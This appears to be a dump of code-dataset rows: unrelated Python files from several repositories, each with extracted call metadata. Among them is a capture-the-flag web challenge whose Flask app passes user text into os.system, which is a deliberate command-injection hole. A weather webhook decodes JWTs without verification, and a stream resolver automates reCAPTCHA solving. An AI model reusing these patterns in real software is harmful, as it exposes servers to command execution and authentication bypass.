detail.add_loop('INS&Y&18&30&XN&AE&RT+')
self.assertTrue(detail.exists('2000'))
class TreeAddNode(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_loop(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, '2400'), 2)
for node in loop2300.select('2400'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, '2400'), 4)
def test_add_segment(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, 'CN1'), 1)
for node in loop2300.select('CN1'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, 'CN1'), 2)
def test_fail(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
for node in loop2300.select('CN1'):
cn1 = node
break
n2400 = None
for node in loop2300.select('2400'):
n2400 = node
break
assert n2400 is not None, 'Loop 2400 was not matched'
self.assertRaises(pyx12.errors.X12PathError, n2400.add_node, cn1)
def _get_count(self, node, loop_id):
ct = 0
for n in node.select(loop_id):
ct += 1
return ct
class CountRepeatingLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300' and datatree.get_value('CLM01') == '5555':
self.loop2300 = datatree
break
def test_repeat_2400(self):
ct = 0
for loop_2400 in self.loop2300.select('2400'):
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2400 loops. Should have %i' % (ct, 3))
def test_repeat_2430(self):
ct = 0
for loop_2430 in self.loop2300.select('2400/2430'):
ct += 1
self.assertEqual(
ct, 0, 'Found %i 2430 loops. Should have %i' % (ct, 0))
class IterateTree(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
def test_iterate_all(self):
ct_2000a = 0
ct_other = 0
for datatree in self.src.iter_segments('2000A'):
if datatree.id == '2000A':
ct_2000a += 1
else:
ct_other += 1
self.assertEqual(ct_2000a, 1,
'Found %i 2000A loops. Should have %i' % (ct_2000a, 1))
self.assertEqual(ct_other, 11, 'Found %i external segments. Should have %i' % (ct_other, 11))
class TreeDeleteSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
assert self.loop2300.get_value('CN101') == '05'
seg_data = pyx12.segment.Segment('CN1*05~', '~', '*', ':')
self.assertTrue(self.loop2300.delete_segment(seg_data))
self.assertEqual(self.loop2300.get_value('CN101'), None)
def test_delete_fail(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
self.assertFalse(self.loop2300.delete_segment(seg_data))
class TreeDeleteLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
self.assertEqual(self.loop2300.get_value('2400/LX01'), '1')
self.assertTrue(self.loop2300.delete_node('2400'))
self.assertEqual(self.loop2300.get_value('2400/LX01'), '2')
def test_delete_fail(self):
self.assertFalse(self.loop2300.delete_node('2500'))
class NodeDeleteSelf(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
cn1 = self.loop2300.first('CN1')
assert cn1.id == 'CN1'
cn1.delete()
try:
a = cn1.id
except EngineError:
pass
except:
a = cn1.id
#self.assertRaises(EngineError, cn1.id)
class TreeCopy(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_node(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertTrue(not svc is new_svc)
datatree.add_node(new_svc)
#for svc in datatree.select('2110'):
# print svc.get_value('SVC01')
break
def test_copy_seg(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
self.assertFalse(svc is new_svc)
self.assertEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertFalse(svc is new_svc)
self.assertNotEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
break
| [((22, 21, 22, 37), 'io.StringIO', 'StringIO', ({(22, 30, 22, 36): 'x12str'}, {}), '(x12str)', False, 'from io import StringIO\n'), ((24, 21, 24, 31), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import StringIO\n'), ((27, 21, 27, 55), 'io.StringIO', 'StringIO', (), '', False, 'from io import StringIO\n'), ((29, 21, 29, 47), 'io.StringIO', 'StringIO', (), '', False, 'from io import StringIO\n')] |
Hades01/Addons | repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py | 710da97ac850197498a3cd64be1811c593610add | # -*- coding: utf-8 -*-
import re,urlparse,cookielib,os,urllib
from liveresolver.modules import client,recaptcha_v2,control,constants, decryptionUtils
from liveresolver.modules.log_utils import log
cookieFile = os.path.join(control.dataPath, 'finecastcookie.lwp')
def resolve(url):
#try:
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer=url
id = urlparse.parse_qs(urlparse.urlparse(url).query)['u'][0]
cj = get_cj()
url = 'http://www.finecast.tv/embed4.php?u=%s&vw=640&vh=450'%id
rs = client.request(url,referer=referer,cj=cj)
sitekey = re.findall('data-sitekey="([^"]+)', rs)[0]
token = recaptcha_v2.UnCaptchaReCaptcha().processCaptcha(sitekey, lang='de')
#1:04
result =client.request (url, post=urllib.urlencode(token),referer=referer)
log(result)
file = re.findall('[\'\"](.+?.stream)[\'\"]',result)[0]
auth = re.findall('[\'\"](\?wmsAuthSign.+?)[\'\"]',result)[0]
rtmp = 'http://play.finecast.tv:1935/live/%s/playlist.m3u8%s'%(file,auth)
return rtmp
#except:
# return
def get_cj():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(cookieFile,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar | [((7, 13, 7, 65), 'os.path.join', 'os.path.join', ({(7, 26, 7, 42): 'control.dataPath', (7, 44, 7, 64): '"""finecastcookie.lwp"""'}, {}), "(control.dataPath, 'finecastcookie.lwp')", False, 'import re, urlparse, cookielib, os, urllib\n'), ((20, 13, 20, 54), 'liveresolver.modules.client.request', 'client.request', (), '', False, 'from liveresolver.modules import client, recaptcha_v2, control, constants, decryptionUtils\n'), ((25, 8, 25, 19), 'liveresolver.modules.log_utils.log', 'log', ({(25, 12, 25, 18): 'result'}, {}), '(result)', False, 'from liveresolver.modules.log_utils import log\n'), ((21, 18, 21, 57), 're.findall', 're.findall', ({(21, 29, 21, 52): '"""data-sitekey="([^"]+)"""', (21, 54, 21, 56): 'rs'}, {}), '(\'data-sitekey="([^"]+)\', rs)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((27, 15, 27, 60), 're.findall', 're.findall', ({(27, 26, 27, 52): '"""[\'"](.+?.stream)[\'"]"""', (27, 53, 27, 59): 'result'}, {}), '(\'[\\\'"](.+?.stream)[\\\'"]\', result)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((28, 15, 28, 66), 're.findall', 're.findall', ({(28, 26, 28, 58): '"""[\'"](\\\\?wmsAuthSign.+?)[\'"]"""', (28, 59, 28, 65): 'result'}, {}), '(\'[\\\'"](\\\\?wmsAuthSign.+?)[\\\'"]\', result)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((41, 20, 41, 44), 'cookielib.LWPCookieJar', 'cookielib.LWPCookieJar', ({}, {}), '()', False, 'import re, urlparse, cookielib, os, urllib\n'), ((47, 20, 47, 44), 'cookielib.LWPCookieJar', 'cookielib.LWPCookieJar', ({}, {}), '()', False, 'import re, urlparse, cookielib, os, urllib\n'), ((22, 16, 22, 49), 'liveresolver.modules.recaptcha_v2.UnCaptchaReCaptcha', 'recaptcha_v2.UnCaptchaReCaptcha', ({}, {}), '()', False, 'from liveresolver.modules import client, recaptcha_v2, control, constants, decryptionUtils\n'), ((24, 42, 24, 65), 'urllib.urlencode', 'urllib.urlencode', ({(24, 59, 24, 64): 'token'}, {}), '(token)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((17, 31, 17, 53), 'urlparse.urlparse', 'urlparse.urlparse', ({(17, 49, 17, 52): 'url'}, {}), '(url)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((12, 40, 12, 62), 'urlparse.urlparse', 'urlparse.urlparse', ({(12, 58, 12, 61): 'url'}, {}), '(url)', False, 'import re, urlparse, cookielib, os, urllib\n')] |
crylearner/RIDE3X | src/robotide/publish/__init__.py | 767f45b0c908f18ecc7473208def8dc7489f43b0 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org:licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Message publishing and subscribing.
.. contents::
:depth: 2
:local:
Introduction
------------
RIDE uses messages for communication when something of interest happens, for
example a suite is loaded or item is selected in the tree. This module provides
means both for subscribing to listen to those messages and for sending them.
Messages are used for communication between the different components of the
core application, but their main usage is notifying plugins about various events.
Plugins can also send messages themselves, and also create custom messages, if
they have a need.
Subscribing
-----------
The core application uses the global `PUBLISHER` object (an instance of the
`Publisher` class) for subscribing to and unsubscribing from the messages.
Plugins should use the helper methods of the `Plugin` class instead of using
the `PUBLISHER` directly.
Message topics
~~~~~~~~~~~~~~
Regardless the method, subscribing to messages requires a message topic.
Topics can be specified using the actual message classes in
`robotide.publish.messages` module or with their dot separated topic strings.
It is, for example, equivalent to use the `RideTreeSelection` class and a
string ``ride.tree.selection``. Topic strings can normally, but not always, be
mapped directly to the class names.
The topic strings represents a hierarchy where the dots separate the hierarchy
levels. All messages with a topic at or below the given level will match the
subscribed topic. For example, subscribing to the ``ride.notebook`` topic means
that `RideNotebookTabChanged` or any other message with a topic starting with
``ride.notebook`` will match.
Listeners
~~~~~~~~~
Another thing needed when subscribing is a listener, which must be a callable
accepting one argument. When the corresponding message is published, the listener
will be called with an instance of the message class as an argument. That instance
contains the topic and possibly some additional information in its attributes.
The following example demonstrates how a plugin can subscribe to an event.
In this example the ``OnTreeSelection`` method is the listener and the
``message`` it receives is an instance of the `RideTreeSelection` class.
::
from robotide.pluginapi import Plugin, RideTreeSelection
class MyFancyPlugin(Plugin):
def activate(self):
self.subscribe(self.OnTreeSelection, RideTreeSelection)
def OnTreeSelection(self, message):
print message.topic, message.node
Unsubscribing
~~~~~~~~~~~~~
Unsubscribing from a single message requires passing the same topic and listener
to the unsubscribe method that were used for subscribing. Additionally both
the `PUBLISHER` object and the `Plugin` class provide a method for unsubscribing
all listeners registered by someone.
Publishing messages
-------------------
Both the core application and plugins can publish messages using message
classes in the `publish.messages` module directly. Sending a message is as easy
as creating an instance of the class and calling its ``publish`` method. What
parameters are need when the instance is created depends on the message.
Custom messages
~~~~~~~~~~~~~~~
Most of the messages in the `publish.messages` module are to be sent only by
the core application. If plugins need their own messages, for example for
communication between different plugins, they can easily create custom messages
by extending the `RideMessage` base class::
from robotide.pluginapi import Plugin, RideMessage
class FancyImportantMessage(RideMessage):
data = ['importance']
class MyFancyPlugin(Plugin):
def important_action(self):
# some code ...
MyImportantMessage(importance='HIGH').publish()
Plugins interested about this message can subscribe to it using either
the class ``FancyImportantMessage`` or its automatically generated title
``fancy.important``. Notice also that all the messages are exposed also through
the `robotide.pluginapi` module and plugins should import them there.
"""
import os
from robotide.context import WX_VERSION
if WX_VERSION > '3.0':
from wx.lib.pubsub import setuparg1
elif WX_VERSION > '2.9':
from wx.lib.pubsub import setupv1
from .messages import *
from .publisher import PUBLISHER
def get_html_message(name):
return open(os.path.join(
os.path.dirname(__file__), 'html', '{}.html'.format(name))).read()
| [((133, 8, 133, 33), 'os.path.dirname', 'os.path.dirname', ({(133, 24, 133, 32): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
pizzapanther/google-actions-python-example | app.py | 40d13fc1821e1e11f15cc7413571cb5bd6327024 | #!/usr/bin/env python
import os
import json
import tornado.ioloop
import tornado.log
import tornado.web
from google.oauth2 import id_token
from google.auth.transport import requests as google_requests
import jwt
import requests
API_KEY = os.environ.get('OPEN_WEATHER_MAP_KEY', None)
PROJECT_ID = os.environ.get('PROJECT_ID', None)
class WeatherHandler(tornado.web.RequestHandler):
def start_conversation (self):
response = {
'expectUserResponse': True,
'expectedInputs': [
{
'possibleIntents': {'intent': 'actions.intent.TEXT'},
'inputPrompt': {
'richInitialPrompt': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>What city would you like the weather for?</speak>'
}
}
]
}
}
}
]
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get_weather (self, city):
api_response = requests.get(
'http://api.openweathermap.org/data/2.5/weather',
params={'q': city, 'APPID': API_KEY}
)
data = api_response.json()
if 'main' not in data:
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>City not found - meow!</speak>'
}
}
]
}
}
}
else:
temp = round(1.8 * (data['main']['temp'] - 273) + 32)
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>The temperature in {} is {} degrees.</speak>'.format(city, temp)
}
}
]
}
}
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get (self):
city = self.get_query_argument('city', '')
if city:
self.get_weather(city)
else:
self.start_conversation()
def post (self):
token = self.request.headers.get("Authorization")
jwt_data = jwt.decode(token, verify=False)
if jwt_data['aud'] != PROJECT_ID:
self.set_status(401)
self.write('Token Mismatch')
else:
request = google_requests.Request()
try:
# Makes external request, remove if not needed to speed things up
id_info = id_token.verify_oauth2_token(token, request, PROJECT_ID)
except:
self.set_status(401)
self.write('Token Mismatch')
data = json.loads(self.request.body.decode('utf-8'))
intent = data['inputs'][0]['intent']
print(intent)
print(data['conversation']['conversationId'])
if intent == 'actions.intent.MAIN':
self.start_conversation()
else:
city = data['inputs'][0]['arguments'][0]['textValue']
self.get_weather(city)
def make_app():
return tornado.web.Application([
(r"/weather-app", WeatherHandler),
], autoreload=True)
if __name__ == "__main__":
tornado.log.enable_pretty_logging()
app = make_app()
app.listen(int(os.environ.get('PORT', '8000')))
tornado.ioloop.IOLoop.current().start()
| [((16, 10, 16, 54), 'os.environ.get', 'os.environ.get', ({(16, 25, 16, 47): '"""OPEN_WEATHER_MAP_KEY"""', (16, 49, 16, 53): 'None'}, {}), "('OPEN_WEATHER_MAP_KEY', None)", False, 'import os\n'), ((17, 13, 17, 47), 'os.environ.get', 'os.environ.get', ({(17, 28, 17, 40): '"""PROJECT_ID"""', (17, 42, 17, 46): 'None'}, {}), "('PROJECT_ID', None)", False, 'import os\n'), ((46, 19, 49, 5), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((99, 15, 99, 46), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((43, 15, 43, 45), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((87, 15, 87, 45), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((105, 16, 105, 41), 'google.auth.transport.requests.Request', 'google_requests.Request', ({}, {}), '()', True, 'from google.auth.transport import requests as google_requests\n'), ((134, 17, 134, 47), 'os.environ.get', 'os.environ.get', ({(134, 32, 134, 38): '"""PORT"""', (134, 40, 134, 46): '"""8000"""'}, {}), "('PORT', '8000')", False, 'import os\n'), ((108, 18, 108, 74), 'google.oauth2.id_token.verify_oauth2_token', 'id_token.verify_oauth2_token', ({(108, 47, 108, 52): 'token', (108, 54, 108, 61): 'request', (108, 63, 108, 73): 'PROJECT_ID'}, {}), '(token, request, PROJECT_ID)', False, 'from google.oauth2 import id_token\n')] |
EVEprosper/ProsperCookiecutters | ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py | 569ca0c311a5ead2b49f0cdde4cb2ad14dcd3a2c | # AUTOGENERATED BY: ProsperCookiecutters/ProsperFlask
# TEMPLATE VERSION: {{cookiecutter.template_version}}
# AUTHOR: {{cookiecutter.author_name}}
"""PyTest fixtures and modifiers"""
import pytest
from {{cookiecutter.library_name}}.endpoints import APP
@pytest.fixture
def app():
"""flask test hook for dry-running Flask code"""
return APP
| [] |
RealOrangeOne/yuri | zoloto/coords.py | 6ed55bdf97c6add22cd6c71c39ca30e2229337cb | from typing import Iterator, NamedTuple, Tuple
from cached_property import cached_property
from cv2 import Rodrigues
from pyquaternion import Quaternion
class Coordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
"""
x: float
y: float
class ThreeDCoordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
:param float z: Z coordinate
"""
x: float
y: float
z: float
class Spherical(NamedTuple):
"""
:param float rot_x: Rotation around the X-axis, in radians
:param float rot_y: Rotation around the Y-axis, in radians
:param float dist: Distance
"""
rot_x: float
rot_y: float
dist: int
ThreeTuple = Tuple[float, float, float]
RotationMatrix = Tuple[ThreeTuple, ThreeTuple, ThreeTuple]
class Orientation:
"""The orientation of an object in 3-D space."""
def __init__(self, e_x: float, e_y: float, e_z: float):
"""
Construct a quaternion given the components of a rotation vector.
More information: https://w.wiki/Fci
"""
rotation_matrix, _ = Rodrigues((e_x, e_y, e_z))
self._quaternion = Quaternion(matrix=rotation_matrix)
@property
def rot_x(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.roll
@property
def rot_y(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.pitch
@property
def rot_z(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw
@property
def yaw(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw_pitch_roll[0]
@property
def pitch(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.yaw_pitch_roll[1]
@property
def roll(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.yaw_pitch_roll[2]
@cached_property
def yaw_pitch_roll(self) -> ThreeTuple:
"""
Get the equivalent yaw-pitch-roll angles.
Specifically intrinsic Tait-Bryan angles following the z-y'-x'' convention.
"""
return self._quaternion.yaw_pitch_roll
def __iter__(self) -> Iterator[float]:
"""
Get an iterator over the rotation angles.
Returns:
An iterator of floating point angles in order x, y, z.
"""
return iter([self.rot_x, self.rot_y, self.rot_z])
@cached_property
def rotation_matrix(self) -> RotationMatrix:
"""
Get the rotation matrix represented by this orientation.
Returns:
A 3x3 rotation matrix as a tuple of tuples.
"""
r_m = self._quaternion.rotation_matrix
return (
(r_m[0][0], r_m[0][1], r_m[0][2]),
(r_m[1][0], r_m[1][1], r_m[1][2]),
(r_m[2][0], r_m[2][1], r_m[2][2]),
)
@property
def quaternion(self) -> Quaternion:
"""Get the quaternion represented by this orientation."""
return self._quaternion
def __repr__(self) -> str:
return "Orientation(rot_x={},rot_y={},rot_z={})".format(
self.rot_x, self.rot_y, self.rot_z
)
| [((55, 29, 55, 55), 'cv2.Rodrigues', 'Rodrigues', ({(55, 39, 55, 54): '(e_x, e_y, e_z)'}, {}), '((e_x, e_y, e_z))', False, 'from cv2 import Rodrigues\n'), ((56, 27, 56, 61), 'pyquaternion.Quaternion', 'Quaternion', (), '', False, 'from pyquaternion import Quaternion\n')] |
JonathanGailliez/azure-sdk-for-python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/bms_container_query_object.py | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BMSContainerQueryObject(Model):
"""The query filters that can be used with the list containers API.
All required parameters must be populated in order to send to Azure.
:param backup_management_type: Required. Backup management type for this
container. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB',
'DPM', 'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param container_type: Type of container for filter. Possible values
include: 'Invalid', 'Unknown', 'IaasVMContainer',
'IaasVMServiceContainer', 'DPMContainer', 'AzureBackupServerContainer',
'MABContainer', 'Cluster', 'AzureSqlContainer', 'Windows', 'VCenter',
'VMAppContainer', 'SQLAGWorkLoadContainer', 'StorageContainer',
'GenericContainer', 'SqlCluster', 'ExchangeDAG', 'SharepointFarm',
'HyperVCluster', 'WindowsClient'
:type container_type: str or
~azure.mgmt.recoveryservicesbackup.models.ContainerType
:param backup_engine_name: Backup engine name
:type backup_engine_name: str
:param fabric_name: Fabric name for filter
:type fabric_name: str
:param status: Status of registration of this container with the Recovery
Services Vault.
:type status: str
:param friendly_name: Friendly name of this container.
:type friendly_name: str
"""
_validation = {
'backup_management_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'container_type': {'key': 'containerType', 'type': 'str'},
'backup_engine_name': {'key': 'backupEngineName', 'type': 'str'},
'fabric_name': {'key': 'fabricName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BMSContainerQueryObject, self).__init__(**kwargs)
self.backup_management_type = kwargs.get('backup_management_type', None)
self.container_type = kwargs.get('container_type', None)
self.backup_engine_name = kwargs.get('backup_engine_name', None)
self.fabric_name = kwargs.get('fabric_name', None)
self.status = kwargs.get('status', None)
self.friendly_name = kwargs.get('friendly_name', None)
| [] |
rdenadai/ia870p3 | ia870/iagradm.py | c4823efc4b8e5f187a64f8a4e9962e328bf86967 | # -*- encoding: utf-8 -*-
# Module iagradm
def iagradm(f, Bdil=None, Bero=None):
from ia870 import iasubm,iadil,iaero,iasecross
if Bdil is None: Bdil = iasecross()
if Bero is None: Bero = iasecross()
y = iasubm( iadil(f,Bdil),iaero(f,Bero))
return y
| [((7, 28, 7, 39), 'ia870.iasecross', 'iasecross', ({}, {}), '()', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((8, 28, 8, 39), 'ia870.iasecross', 'iasecross', ({}, {}), '()', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((10, 16, 10, 29), 'ia870.iadil', 'iadil', ({(10, 22, 10, 23): 'f', (10, 24, 10, 28): 'Bdil'}, {}), '(f, Bdil)', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n'), ((10, 30, 10, 43), 'ia870.iaero', 'iaero', ({(10, 36, 10, 37): 'f', (10, 38, 10, 42): 'Bero'}, {}), '(f, Bero)', False, 'from ia870 import iasubm, iadil, iaero, iasecross\n')] |
ChristchurchCityWeightlifting/lifter-api | backend/api/tests/test_models/test_utils/test_ranking_suffixes.py | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | import pytest
from api.models.utils import rankings
@pytest.fixture
def test_data():
return [1, 11, 101]
def test_rankings(test_data):
"""Tests if ranking works
e.g. 1 returns 1st
11 returns 11th
101 return 101st
"""
assert rankings(test_data[0]) == "1st"
assert rankings(test_data[1]) == "11th"
assert rankings(test_data[2]) == "101st"
| [((17, 11, 17, 33), 'api.models.utils.rankings', 'rankings', ({(17, 20, 17, 32): 'test_data[0]'}, {}), '(test_data[0])', False, 'from api.models.utils import rankings\n'), ((18, 11, 18, 33), 'api.models.utils.rankings', 'rankings', ({(18, 20, 18, 32): 'test_data[1]'}, {}), '(test_data[1])', False, 'from api.models.utils import rankings\n'), ((19, 11, 19, 33), 'api.models.utils.rankings', 'rankings', ({(19, 20, 19, 32): 'test_data[2]'}, {}), '(test_data[2])', False, 'from api.models.utils import rankings\n')] |
NoXLaw/RaRCTF2021-Challenges-Public | web/web-lemonthinker/src/app/app.py | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | [((7, 8, 7, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((8, 6, 8, 21), 'flask.Flask', 'Flask', ({(8, 12, 8, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, request, redirect, url_for\n'), ((24, 4, 24, 59), 'os.system', 'os.system', ({(24, 14, 24, 58): 'f"""python3 generate.py {filename} "{text}\\""""'}, {}), '(f\'python3 generate.py {filename} "{text}"\')', False, 'import os\n'), ((19, 6, 19, 37), 'os.system', 'os.system', ({(19, 16, 19, 36): '"""rm static/images/*"""'}, {}), "('rm static/images/*')", False, 'import os\n'), ((20, 14, 20, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((21, 11, 21, 39), 'flask.request.form.getlist', 'request.form.getlist', ({(21, 32, 21, 38): '"""text"""'}, {}), "('text')", False, 'from flask import Flask, request, redirect, url_for\n'), ((25, 20, 25, 68), 'flask.url_for', 'url_for', (), '', False, 'from flask import Flask, request, redirect, url_for\n'), ((18, 7, 18, 18), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((23, 23, 23, 48), 'random.choices', 'random.choices', (), '', False, 'import random\n')] |
renatodev95/Python | aprendizado/codewars/descending_order.py | 2adee4a01de41f8bbb68fce563100c135a5ab549 | # Your task is to make a function that can take any non-negative integer as an argument and return it with its digits in descending order. Essentially, rearrange the digits to create the highest possible number.
# Função que recebe um número inteiro (não negativo) como argumento e o retorna com os dígitos em ordem descendente. Essencialmente, organize os dígitos para criar o maior número possível.
# Primeiro código
def descending_order(num):
new_num = str(num)
new_num1 = [int(x) for x in new_num]
new_num1 = sorted(new_num1, reverse=True)
string = ''
for x in new_num1:
string += str(x)
return int(string)
# Refatoração do primeiro código (utilizando list comprehension)
def descending_order_two(num):
return int(''.join([x for x in sorted(str(num), reverse=True)]))
#
#
| [] |
Schramp/dmarc-monitoring | dmarc_storage.py | 619a162f71a788e81d92ca281ec0bdcf13c2e8e8 | import sqlite3
import os
import datetime
__all__ = ['DMARCStorage', 'totimestamp']
def totimestamp(datetime_object):
if datetime_object.utcoffset() is not None:
utc_naive = datetime_object.replace(tzinfo=None) - datetime_object.utcoffset()
else:
utc_naive = datetime_object
return (utc_naive - datetime.datetime(1970, 1, 1)).total_seconds()
class DMARCStorage(object):
def __init__(self, database_filename='dmarc.sqlite', database_directory="./results"):
# Create or connect to the database:
database_path = os.path.join(database_directory, database_filename)
if not os.path.exists(database_directory):
os.makedirs(database_directory)
self._conn = sqlite3.connect(database_path)
# Set automcommit to true and initialise cursor:
self._conn.isolation_level = None
self._cur = self._conn.cursor()
# Create the tables if they don't exist already:
self._init_database()
def __del__(self):
if self._conn is not None:
self._close_connection()
def _init_database(self):
self._cur.execute("PRAGMA foreign_keys = ON;")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_reports (
report_id TEXT PRIMARY KEY,
receiver TEXT,
report_filename TEXT,
report_start INTEGER,
report_end INTEGER
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_records (
report_id TEXT REFERENCES dmarc_reports(report_id) ON DELETE CASCADE,
record_id INTEGER,
ip_address TEXT,
hostname TEXT,
disposition TEXT,
reason TEXT,
spf_pass INTEGER,
dkim_pass INTEGER,
header_from TEXT,
envelope_from TEXT,
